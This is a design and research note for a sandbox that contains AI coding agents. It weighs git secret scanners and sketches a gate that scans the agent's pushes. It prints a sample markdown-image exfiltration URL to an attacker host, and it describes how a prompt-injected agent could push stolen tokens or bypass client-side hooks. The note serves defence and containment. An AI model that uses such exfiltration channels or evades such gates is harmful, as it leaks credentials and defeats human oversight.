Files
bot-bottle/docs/research/git-secret-scanning-hardening.md
T
2026-05-28 17:56:14 -04:00

13 KiB

Git secret scanning as further hardening

Research into whether bot-bottle should add a secret-scanning step to its git workflow — both on the host repo and (potentially) inside bottles — and what tools exist for it. Motivated by the threat model below: a secret accidentally git pushed to a public remote is already compromised the moment the push hits the wire, well before anyone clicks "merge."

Summary

A pre-commit / pre-push secret scanner is a cheap, high-leverage layer of defense-in-depth that doesn't replace any existing control (.gitignore, environment-variable hygiene, network egress guards) but catches the one case where everything else fails: a credential ending up in a tracked file or commit message and being pushed to a public remote. For bot-bottle specifically, gitleaks is the clearest fit — Go binary, MIT, scans full history including commit messages, runs fully offline, and integrates with the existing .githooks/ directory without adding a new runtime.

Attack vector: a secret pushed to a public GitHub repo

The naive mental model is "if I notice the leak before the PR is merged, I can force-push and the secret is gone." That mental model is wrong in two distinct ways, and both apply the instant git push completes — not at merge time.

1. The push itself publishes the secret

The moment a commit lands on a public GitHub repo — on any branch, in any open PR, on any fork — it is publicly fetchable by URL and broadcast by GitHub's event firehose:

  • The commit blob is reachable at github.com/<owner>/<repo>/commit/<sha> and via the raw API. No login or merge required.
  • GitHub's public events API streams every push as it happens. The GH Archive project mirrors that stream and republishes it; multiple Common-Crawl-style datasets ingest from it on a continuous basis.
  • Independent scrapers (and there are many) sit on the events API watching specifically for commits whose diffs match high-value credential patterns — AWS keys, GitHub PATs, Stripe keys, OAuth tokens, OpenAI keys, etc. Empirically, observed time-to-abuse for a leaked AWS key on a public push is on the order of seconds to minutes. The window in which "I'll just force-push" still works effectively does not exist.
  • Even after a force-push, the orphaned commit remains reachable by SHA until GitHub's garbage collection runs (and the SHA itself leaks via the events API). Treat any secret that has touched a public remote as burned: rotate it.

This is the dominant risk, and on its own it is enough to justify pre-push secret scanning.

2. Render-time callbacks fire even on un-merged PRs

A separate, sneakier vector: a public PR doesn't have to be merged to cause an outbound request to a server the pusher controls. Opening the PR is enough. Rendering surfaces along the review path will fetch remote resources embedded in the diff or in PR metadata:

  • Markdown files in the diff are rendered with image and link preview support. An ![](https://attacker.example/pixel.png?token=…) in a new README pings the attacker the moment a reviewer (or GitHub's own renderer warming a cache) views the file. GitHub proxies most image fetches through camo.githubusercontent.com, which mitigates direct IP capture but does not stop the fetch itself — the attacker still gets the request, and the URL path can carry exfiltrated bytes.
  • PR body, commit message, and issue body all render markdown with the same image/link semantics. A poisoned commit message with an embedded image URL pings home when the PR is opened in the web UI, regardless of merge state.
  • Link unfurls in PR descriptions, Slack notifications wired to the repo, and various CI bots all dereference URLs at preview time. Each is an independent "ping home" opportunity.
  • CI on PR open runs on the fork's HEAD by default for many workflow types. Any curl in a build step is an exfil channel before a human ever looks at the PR.

The composite point: by the time a reviewer thinks "hmm, this looks suspicious, let me close without merging," the bytes that mattered are already on the attacker's box. Detection has to be at commit time (or push time at the latest), not at review time.

Why this matters for bot-bottle

Two surfaces are exposed:

  1. The bot-bottle repo itself. Development happens on a host with BOT_BOTTLE_OAUTH_TOKEN, Gitea tokens, and other credentials in the environment. A fixture, test snapshot, log capture, or pasted-in debug output could carry one of them into a tracked file. The repo's Gitea remote is private, but mirrors or GitHub forks may not be.
  2. Bottles that push to external remotes. An agent inside a bottle that has been granted git push credentials to a public repo is one prompt-injection away from being induced to commit a captured token and push it. The egress guard catches most exfiltration channels (statsig, npm, arbitrary HTTPS), but git push to an allowlisted code host is by design an outbound channel that works. That is the whole point of letting the agent push code. A secret scanner inside the bottle's git hooks is the only layer that can intercept content before it leaves on an otherwise-legitimate channel.

The first surface is the primary one for this note. The second looks harder — anything inside the bottle is by assumption adversary-controlled, so an in-bottle hook can be bypassed with --no-verify, removed outright, or simply not configured — but it yields to the same trick already used for the OAuth token and HTTPS inspection: move the check across a kernel-enforced process boundary that the agent cannot reach.

Solution for the bottle surface: a git gate

Route bottle-side git push through an intermediary git endpoint — a "git gate" — that runs gitleaks on the incoming objects before forwarding to the real remote:

  • The bottle's git remote is rewritten to point at the gate (e.g. git@gate.bottle.local:owner/repo.git, or an HTTPS endpoint on a loopback / sidecar address). The agent inside the bottle sees only the gate URL.
  • The gate runs as a separate process / container that the bottle's unprivileged agent cannot read or modify. It holds the real push credential (deploy key, PAT, ssh agent socket) — the bottle never sees it, same as the auth-injecting proxy for ANTHROPIC_BASE_URL in agent-credential-proxy-landscape.md.
  • On receive, the gate runs gitleaks detect against the incoming refs (and their message text) in a temporary working tree. Clean pushes are forwarded to the real remote. Findings cause the push to be rejected; the agent sees a normal-looking remote: rejected message.
  • Network egress out of the bottle is locked to the gate only. Direct pushes to github.com, gitlab.com, etc., fail at the egress layer, so the agent cannot bypass the gate by reconfiguring the remote URL. The egress guard already in network-egress-guard.md is the load-bearing control here.

Properties this gives:

  • --no-verify does not help the attacker — the check runs on the receiving side, not in a client hook.
  • Bypass attempts fail closed. Removing the remote, force-pushing, pushing to a different host, or shelling out around git all hit the same egress allowlist.
  • The push credential never enters the bottle. Compromising the agent doesn't compromise the credential, only the ability to ask the gate to push on its behalf — and the gate refuses dirty pushes.
  • Pattern is reusable. The gate is shape-compatible with the auth-injecting proxy and with pipelock's TLS interception: a sidecar that holds the credential, enforces a policy on traffic, and is unreachable by the unprivileged in-bottle UID.

Open questions deferred to design work, not blockers for this note:

  • SSH vs HTTPS for the bottle→gate hop. SSH lets the agent use a per-bottle key the gate authenticates; HTTPS over loopback is simpler and pairs naturally with pipelock.
  • Whether the gate should also enforce repo / branch allowlists per bottle, or stay narrowly focused on secret scanning. Probably narrow first, expand later.
  • Performance on large pushes. gitleaks on a few-MB diff is sub-second; on a large monorepo first push it may take seconds. Acceptable.

Tool landscape (2026)

Tool Install Full history Commit msgs Detection Status License
gitleaks brew install gitleaks yes (--log-opts="--all") yes regex + entropy, ~150 rules very active (v8.x) MIT
TruffleHog v3 brew, Docker, GH Action yes yes regex + live API verification (700+ types) very active AGPL-3.0
detect-secrets (Yelp) pip install working tree + baseline no regex + entropy active, slower cadence Apache 2.0
git-secrets (AWS Labs) brew yes (--scan-history) yes regex only, AWS-focused maintenance mode since ~2021 Apache 2.0
ggshield (GitGuardian) pip install yes yes proprietary ML + regex, optional verified very active, commercial MIT CLI, SaaS engine

Other names that surfaced but do not fit: Semgrep (general SAST, not git-history-native), whispers (Python, low adoption).

Notes on the contenders:

  • gitleaks is the de-facto open-source standard. The protect --staged mode is purpose-built for pre-commit; the detect --log-opts="--all" mode walks every commit including message text. No network dependency.
  • TruffleHog v3 is the strongest one-shot auditor because it can make live API calls to confirm whether a found credential is still valid. AGPL is fine for internal use but a consideration if the detection step gets embedded in a redistributable artifact. Best as a "run once on history" tool, not as the everyday hook.
  • detect-secrets is well-loved for its baseline-file workflow (you declare existing secrets as known and only fail on new ones), but commit-message scanning is not first-class.
  • git-secrets is effectively superseded by gitleaks. No reason to start a new project on it.
  • ggshield is good if you want a hosted dashboard and incident management, but it ships repo content to GitGuardian's API by default — wrong fit for a project whose entire premise is sandbox isolation.

Commit message scanning

Several real-world leaks have come from secrets pasted into commit messages (often by automation that includes captured CLI output in auto-generated messages). gitleaks, TruffleHog, git-secrets, and ggshield all scan message text in history mode. detect-secrets does not — it is content-focused. Anyone using detect-secrets should pair it with a separate message-scanning step.

In priority order, for the host bot-bottle repo:

  1. One-time retro scan with gitleaks: gitleaks detect --source . --log-opts="--all" --redact. Catches anything currently in history including commit messages. --redact keeps any findings out of the rendered output. Treat any hit as a rotated credential, not as a "fix the commit" problem (see attack-vector section above for why).
  2. Add a pre-commit hook in .githooks/ that runs gitleaks protect --staged. Fits the project's existing pattern (the conventional-commits commit-msg hook lives there), needs no new runtime, fully offline.
  3. Optional one-time live-verification pass with TruffleHog: trufflehog git file://. --only-verified. Tells you whether any historically leaked credential is still active — actionable in a way pattern-matching alone is not.

For the bottle surface, the follow-up is the git-gate design sketched above: a sidecar git endpoint that bottles push to, that runs gitleaks on incoming refs before forwarding to the real remote, with egress locked to the gate so the agent cannot push directly. Tracked as a future PRD; ordering it after the network egress guard is correct because the egress allowlist is the control that prevents bypass and is therefore the prerequisite.

Sources